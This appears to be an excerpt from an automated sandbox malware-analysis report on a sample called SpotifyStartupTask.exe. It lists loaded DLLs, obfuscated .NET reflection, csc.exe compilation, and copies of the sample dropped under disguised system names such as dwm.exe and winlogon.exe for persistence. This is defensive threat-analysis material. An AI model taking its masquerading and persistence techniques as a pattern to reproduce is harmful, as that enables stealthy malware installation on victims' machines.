                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: mscoree.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: apphelp.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: version.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: uxtheme.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: windows.storage.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: wldp.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: profapi.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\DiagTrack\dwm.exe Section loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: version.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: wldp.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: profapi.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Section loaded: sspicli.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: mscoree.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: apphelp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: version.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: uxtheme.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: windows.storage.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: wldp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: profapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: sspicli.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: ktmw32.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: wbemcomn.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: amsi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: userenv.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: iphlpapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: dnsapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: dhcpcsvc6.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: dhcpcsvc.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: winnsi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: rasapi32.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: rasman.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: rtutils.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: mswsock.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: winhttp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: rasadhlp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: fwpuclnt.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: winmm.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: winmmbase.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: mmdevapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: devobj.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: ksuser.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: avrt.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: audioses.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: powrprof.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: umpdc.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: msacm32.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: midimap.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: edputil.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: dwrite.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: windowscodecs.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: ntmarta.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: dpapi.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: secur32.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: schannel.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: mskeyprotect.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: ntasn1.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: ncrypt.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: ncryptsslp.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: msasn1.dll
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Section loaded: gpapi.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: mscoree.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: apphelp.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: version.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: uxtheme.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: windows.storage.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: wldp.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: profapi.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Section loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: version.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: wldp.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: profapi.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Section loaded: sspicli.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: mscoree.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: apphelp.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: kernel.appcore.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: version.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: uxtheme.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: windows.storage.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: wldp.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: profapi.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: cryptsp.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: rsaenh.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: cryptbase.dll
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Section loaded: sspicli.dll
                              Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Directory created: C:\Program Files\7-Zip\Lang\winlogon.exe
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Directory created: C:\Program Files\7-Zip\Lang\cc11b995f2a76d
                              Source: SpotifyStartupTask.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: SpotifyStartupTask.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                              Source: SpotifyStartupTask.exe Static file information: File size 2019328 > 1048576
                              Source: SpotifyStartupTask.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1ec800
                              Source: SpotifyStartupTask.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2482149517.000000001BB76000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: :C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.pdb source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003348000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              Source: SpotifyStartupTask.exe, VEVhb7XLtaEPLCTTawQ.cs .Net Code: Type.GetTypeFromHandle(AW1Rey4jZMVuIAtsvyT.awQ82OyVQYc(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(AW1Rey4jZMVuIAtsvyT.awQ82OyVQYc(16777245)),Type.GetTypeFromHandle(AW1Rey4jZMVuIAtsvyT.awQ82OyVQYc(16777259))})
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline"
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Code function: 0_2_00007FF88B4E00BD pushad ; iretd 0_2_00007FF88B4E00C1
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Code function: 0_2_00007FF88B4E5368 push cs; ret 0_2_00007FF88B4E5379
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Code function: 0_2_00007FF88B642E06 push ebx; ret 0_2_00007FF88B642E09
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Code function: 0_2_00007FF88B8E5BC1 push esi; retf 0_2_00007FF88B8E5BC7
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Code function: 0_2_00007FF88B8E1595 push edx; ret 0_2_00007FF88B8E1596
                              Source: C:\Windows\DiagTrack\dwm.exe Code function: 24_2_00007FF88B4F59E1 push ds; retf 24_2_00007FF88B4F5A0F
                              Source: C:\Windows\DiagTrack\dwm.exe Code function: 24_2_00007FF88B4E79C7 push ebp; ret 24_2_00007FF88B4E79C8
                              Source: C:\Windows\DiagTrack\dwm.exe Code function: 24_2_00007FF88B4E71AE push cs; iretd 24_2_00007FF88B4E71AF
                              Source: C:\Windows\DiagTrack\dwm.exe Code function: 24_2_00007FF88B4D00BD pushad ; iretd 24_2_00007FF88B4D00C1
                              Source: C:\Windows\DiagTrack\dwm.exe Code function: 24_2_00007FF88B4D5368 push cs; ret 24_2_00007FF88B4D5379
                              Source: C:\Windows\DiagTrack\dwm.exe Code function: 25_2_00007FF88B4F00BD pushad ; iretd 25_2_00007FF88B4F00C1
                              Source: C:\Windows\DiagTrack\dwm.exe Code function: 25_2_00007FF88B4F5368 push cs; ret 25_2_00007FF88B4F5379
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Code function: 26_2_00007FF88B4E79C7 push ebp; ret 26_2_00007FF88B4E79C8
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Code function: 26_2_00007FF88B4E71AE push cs; iretd 26_2_00007FF88B4E71AF
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Code function: 26_2_00007FF88B4F59E1 push ds; retf 26_2_00007FF88B4F5A0F
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Code function: 26_2_00007FF88B4D00BD pushad ; iretd 26_2_00007FF88B4D00C1
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Code function: 26_2_00007FF88B4D5368 push cs; ret 26_2_00007FF88B4D5379
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Code function: 27_2_00007FF88B4C00BD pushad ; iretd 27_2_00007FF88B4C00C1
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Code function: 27_2_00007FF88B4C5368 push cs; ret 27_2_00007FF88B4C5379
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4F79C7 push ebp; ret 28_2_00007FF88B4F79C8
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4F71AE push cs; iretd 28_2_00007FF88B4F71AF
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B5059E1 push ds; retf 28_2_00007FF88B505A0F
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4E00BD pushad ; iretd 28_2_00007FF88B4E00C1
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4E5368 push cs; ret 28_2_00007FF88B4E5379
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4E00BD pushad ; iretd 29_2_00007FF88B4E00C1
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4E5368 push cs; ret 29_2_00007FF88B4E5379
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4F79C7 push ebp; ret 29_2_00007FF88B4F79C8
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4F71AE push cs; iretd 29_2_00007FF88B4F71AF
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B5059E1 push ds; retf 29_2_00007FF88B505A0F
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B642E06 push ebx; ret 29_2_00007FF88B642E09
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B8E1595 push edx; ret 29_2_00007FF88B8E1596
                              Source: SpotifyStartupTask.exeStatic PE information: section name: .text entropy: 7.575623645429234
                              Source: dwm.exe.0.drStatic PE information: section name: .text entropy: 7.575623645429234
                              Source: PQ4HCWgZazguIsFyU1PhJ.exe.0.drStatic PE information: section name: .text entropy: 7.575623645429234
                              Source: dxLy2s6A.exe.0.drStatic PE information: section name: .text entropy: 7.575623645429234
                              Source: winlogon.exe.0.drStatic PE information: section name: .text entropy: 7.575623645429234
                              Source: SpotifyStartupTask.exe, nBWRulnX6Omlss7TLyG.csHigh entropy of concatenated method names: 'nwRn4s4Tpy', 'cTQneSkGaH', 'oJlnzOuG2a', 'nSE3pfgWgU', 'BQW3kb3eAV', 'Hhy384ZyEF', 'l0Q3GgQQ5R', 'pNx39Q7rg2', 'br232k9ar3', 'FDN3FGZAg5'

                              Persistence and Installation Behavior

                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Windows\DiagTrack\dwm.exe
                              Source: unknown Executable created and started: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe
                              Source: unknown Executable created and started: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe
                              Source: unknown Executable created and started: C:\Windows\DiagTrack\dwm.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Users\user\Desktop\Rlqiwetw.log
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Program Files\7-Zip\Lang\winlogon.exe
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe File created: C:\Users\user\Desktop\jWsFKvpe.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe File created: C:\Users\user\Desktop\LWyBOcEb.log
